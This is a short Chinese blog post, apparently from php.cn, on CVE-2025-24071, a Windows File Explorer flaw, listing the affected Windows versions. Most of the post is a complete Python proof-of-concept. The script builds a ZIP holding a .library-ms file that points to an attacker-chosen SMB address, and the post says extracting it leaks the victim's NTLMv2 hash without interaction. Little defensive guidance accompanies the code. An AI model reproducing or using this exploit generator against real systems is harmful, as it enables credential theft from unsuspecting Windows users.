CVE-2025-24071|Windows 文件资源管理器欺骗漏洞(POC)

星夢妙者
发布: 2025-09-10 08:57:19
原创
634人浏览过

cve-2025-24071|windows 文件资源管理器欺骗漏洞(poc)

0x00 前言

Windows 文件资源管理器(File Explorer)作为Windows系统的关键组成部分,承担着管理与访问本地及网络文件资源的核心职能。它提供用户友好的图形界面,支持文件的浏览、复制、移动、删除、重命名等基本操作,同时集成了网络共享、外部设备识别、文件搜索与过滤等高级功能,是日常多任务文件处理不可或缺的工具

0x01 漏洞概述

当用户使用Windows资源管理器解压含有恶意构造的

.library-ms
登录后复制
文件的ZIP或RAR压缩包时,系统会自动解析该文件中嵌入的SMB路径(例如:\192.168.1.116shared),进而触发向远程服务器发起NTLM身份验证请求,造成用户的NTLMv2哈希值在无交互情况下被泄露。

0x02 CVE编号

CVE-2025-24071

0x03 受影响版本

FlowIn
FlowIn

AI 时代下的内容共创平台,借助 FlowIn AI 撰写与改写内容十分便利。

FlowIn 324
查看详情 FlowIn
Windows Server 2012 R2 (Server Core installation)Windows Server 2012 R2Windows Server 2016 (Server Core installation)Windows Server 2016Windows 10 Version 1607 for x64-based SystemsWindows 10 Version 1607 for 32-bit SystemsWindows 10 for x64-based SystemsWindows 10 for 32-bit SystemsWindows Server 2025Windows 11 Version 24H2 for x64-based SystemsWindows 11 Version 24H2 for ARM64-based SystemsWindows Server 2022, 23H2 Edition (Server Core installation)Windows 11 Version 23H2 for x64-based SystemsWindows 11 Version 23H2 for ARM64-based SystemsWindows Server 2025 (Server Core installation)Windows 10 Version 22H2 for 32-bit SystemsWindows 10 Version 22H2 for ARM64-based SystemsWindows 10 Version 22H2 for x64-based SystemsWindows 11 Version 22H2 for x64-based SystemsWindows 11 Version 22H2 for ARM64-based SystemsWindows 10 Version 21H2 for x64-based SystemsWindows 10 Version 21H2 for ARM64-based SystemsWindows 10 Version 21H2 for 32-bit SystemsWindows Server 2022 (Server Core installation)Windows Server 2022Windows Server 2019 (Server Core installation)Windows Server 2019Windows 10 Version 1809 for x64-based SystemsWindows 10 Version 1809 for 32-bit Systems
登录后复制

0x04 漏洞利用示例(POC)

项目地址:

https://www.php.cn/link/35f4421c476ab29bd7492717ccb0642c

import os
import zipfile

def main():
    file_name = input("Enter your file name: ")
    ip_address = input("Enter IP (EX: 192.168.1.162): ")
    library_content = f"""<?xml version="1.0" encoding="UTF-8"?>
<librarydescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchconnectordescriptionlist>
    <searchconnectordescription>
      <simplelocation>
        <url>\\{ip_address}\shared</url>
      </simplelocation>
    </searchconnectordescription>
  </searchconnectordescriptionlist>
</librarydescription>"""
    library_file_name = f"{file_name}.library-ms"
    with open(library_file_name, "w", encoding="utf-8") as f:
        f.write(library_content)
    with zipfile.ZipFile("exploit.zip", mode="w", compression=zipfile.ZIP_DEFLATED) as zipf:
        zipf.write(library_file_name)
    if os.path.exists(library_file_name):
        os.remove(library_file_name)
    print("completed")

if __name__ == "__main__":
    main()
登录后复制

0x05 参考资料

https://www.php.cn/link/f08f86e95c9d083c89f058285f9ff636

以上就是CVE-2025-24071|Windows 文件资源管理器欺骗漏洞(POC)的详细内容,更多请关注php中文网其它相关文章!

最佳 Windows 性能的顶级免费优化软件
最佳 Windows 性能的顶级免费优化软件

每个人都需要一台速度更快、更稳定的 PC。随着时间的推移,垃圾文件、旧注册表数据和不必要的后台进程会占用资源并降低性能。幸运的是,许多工具可以让 Windows 保持平稳运行。

下载
来源:php中文网
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
最新问题
开源免费商场系统广告
热门教程
更多>
最新下载
更多>
网站特效
网站源码
网站素材
前端模板
关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新 English
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送
PHP中文网APP
随时随地碎片化学习

Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号